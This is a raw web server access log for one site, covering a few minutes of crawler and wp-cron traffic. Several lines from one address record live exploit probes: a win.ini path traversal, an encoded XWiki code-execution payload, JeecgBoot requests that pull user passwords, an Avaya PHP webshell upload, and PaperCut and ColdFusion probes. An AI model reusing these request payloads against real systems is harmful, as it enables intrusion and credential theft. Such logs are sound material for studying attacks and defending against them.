20.171.207.254 - - [18/Oct/2025:13:00:47 -0400] "GET /products60913094?kg=0060170334 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:13:01:09 -0400] "GET /?products581794?kg=0000574780 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:13:02:39 -0400] "GET /categories/11401426 HTTP/1.1" 200 29493 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
20.171.207.254 - - [18/Oct/2025:13:02:53 -0400] "GET /products60939152?kg=0060196073 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:13:03:16 -0400] "GET /products46024956?kg=0045463759 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:03:21 -0400] "GET /products128694198?kg=0127124838 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
196.240.60.201 - - [18/Oct/2025:13:03:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:13:03:33 -0400] "GET /products172173154?kg=0170073564 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:03:39 -0400] "GET /products179055154?kg=0176871636 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:03:49 -0400] "GET /products101881228?kg=0100638855 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:13:03:56 -0400] "GET /products60923298?kg=0060180412 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.70.29.56 - - [18/Oct/2025:13:04:03 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
209.126.12.96 - - [18/Oct/2025:13:04:10 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
216.73.216.159 - - [18/Oct/2025:13:04:03 -0400] "GET /products175134206?kg=0172998506 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:13:04:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760807055.5783720016479492187500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:13:04:12 -0400] "GET /products6771350?kg=0006688854 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:04:22 -0400] "GET /products6785204?kg=0006702539 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:04:27 -0400] "GET /products181997278?kg=0179777882 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:13:04:33 -0400] "POST /CFIDE/adminapi/base.cfc?method HTTP/1.1" 404 12304 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:13:04:41 -0400] "GET /products126480458?kg=0124938096 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:04:46 -0400] "GET /products9046568?kg=0008936325 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:04:56 -0400] "GET /products100466122?kg=0099241008 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:05:06 -0400] "GET /products97581034?kg=0096391104 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:13:05:34 -0400] "POST /wp-cron.php?doing_wp_cron=1760807134.7713398933410644531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - fedish265pro [18/Oct/2025:13:05:29 -0400] "GET /b_download/index.html HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
66.249.64.106 - - [18/Oct/2025:13:06:26 -0400] "GET /?products581836?kg=0000574823 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:13:06:27 -0400] "POST /wp-cron.php?doing_wp_cron=1760807187.0687630176544189453125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:13:02:57 -0400] "POST /wp-cron.php?doing_wp_cron=1760806976.9699890613555908203125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:13:03:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760806998.9786849021911621093750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
57.141.0.48 - - [18/Oct/2025:13:03:25 -0400] "GET /products132077122?kg=0130466508 HTTP/1.1" 404 49076 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
3.10.142.179 - - [18/Oct/2025:13:03:31 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:13:03:31 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:13:03:27 -0400] "GET /products117714244?kg=0116278787 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
152.42.157.60 - - [18/Oct/2025:13:03:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:13:03:45 -0400] "GET /products68849942?kg=0068010390 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:03:54 -0400] "GET /products180311472?kg=0178112633 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
209.126.12.96 - - [18/Oct/2025:13:04:10 -0400] "POST /xmlrpc.php HTTP/1.1" 200 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
216.73.216.159 - - [18/Oct/2025:13:04:17 -0400] "GET /products76567336?kg=0075633669 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:04:35 -0400] "GET /products173236562?kg=0171124004 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:13:05:00 -0400] "GET /products60907554?kg=0060164860 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - fedish264pro [18/Oct/2025:13:05:29 -0400] "GET /b_download/index.html HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:13:05:52 -0400] "GET /products13154686?kg=0012994346 HTTP/1.1" 200 28975 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:13:06:00 -0400] "GET /products60934692?kg=0060191667 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:13:06:24 -0400] "GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:13:06:33 -0400] "GET /products218260252?kg=0215598623 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:13:06:30 -0400] "GET /?products122543552?kg=0121049201 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:13:06:28 -0400] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
157.20.32.210 - - [18/Oct/2025:13:06:37 -0400] "PUT /PhoneBackup/4ISONM3Z.php HTTP/1.1" 404 10848 "-" "AVAYA"
216.73.216.159 - - [18/Oct/2025:13:06:41 -0400] "GET /products218242636?kg=0215581223 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:13:06:46 -0400] "GET /PhoneBackup/4ISONM3Z.php?input=MzRFWWJGNWpMTnlpNlhIQ0tuTzhKaUgydlNF HTTP/1.1" 404 10906 "-" "AVAYA"
216.73.216.159 - - [18/Oct/2025:13:06:46 -0400] "GET /products95178416?kg=0094017785 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:06:51 -0400] "GET /products119089670?kg=0117637438 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:06:56 -0400] "GET /products95221142?kg=0094059990 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:13:07:02 -0400] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0"
66.249.64.107 - - [18/Oct/2025:13:07:11 -0400] "GET /?products122546754?kg=0121052364 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:13:07:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760807236.3723809719085693359375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:13:07:13 -0400] "POST /app HTTP/1.1" 404 10847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:32 -0400] "POST /app HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1"
66.249.64.106 - - [18/Oct/2025:13:07:43 -0400] "GET /products121544126?kg=0120061962 HTTP/1.1" 200 29009 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:13:07:35 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:13:07:35 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
157.20.32.210 - - [18/Oct/2025:13:07:35 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:06:39 -0400] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 404 12363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
66.249.64.105 - - [18/Oct/2025:13:06:51 -0400] "GET /?products17782442?kg=0017565664 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:13:06:48 -0400] "GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:13:07:01 -0400] "GET /products60901856?kg=0060159233 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:13:07:01 -0400] "GET /products153879642?kg=0152003144 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:13:07:21 -0400] "POST /app HTTP/1.1" 404 10856 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/10.0"
157.20.32.210 - - [18/Oct/2025:13:07:35 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
157.20.32.210 - - [18/Oct/2025:13:07:39 -0400] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:13:07:53 -0400] "GET /products121544136?kg=0120061973 HTTP/1.1" 200 29037 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:13:07:46 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
157.20.32.210 - - [18/Oct/2025:13:07:46 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:46 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
66.249.64.106 - - [18/Oct/2025:13:08:01 -0400] "GET /?products578710?kg=0000571734 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:13:08:03 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:59 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:59 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:13:07:59 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
66.249.64.105 - - [18/Oct/2025:13:08:12 -0400] "GET /products17950452?kg=0017731627 HTTP/1.1" 200 28859 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:13:08:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760807298.4707639217376708984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:13:08:09 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:39 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:46 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
157.20.32.210 - - [18/Oct/2025:13:07:50 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:50 -0400] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:08:03 -0400] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:07:59 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
66.249.64.106 - - [18/Oct/2025:13:08:09 -0400] "GET /products13150304?kg=0012990017 HTTP/1.1" 200 30942 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:13:08:04 -0400] "GET /products60907104?kg=0060164417 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:13:08:09 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
157.20.32.210 - - [18/Oct/2025:13:08:09 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:13:08:09 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
157.20.32.210 - - [18/Oct/2025:13:08:12 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"
157.20.32.210 - - [18/Oct/2025:13:08:23 -0400] "POST /app HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"
157.20.32.210 - - [18/Oct/2025:13:08:31 -0400] "GET /app?service=page/PrinterList HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/619.29 (KHTML, like Gecko) Version/17.0.14 Safari/619.29"
157.20.32.210 - - [18/Oct/2025:13:08:47 -0400] "GET /api/server/version HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:13:08:33 -0400] "GET /products13812294?kg=0013643934 HTTP/1.1" 200 28974 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
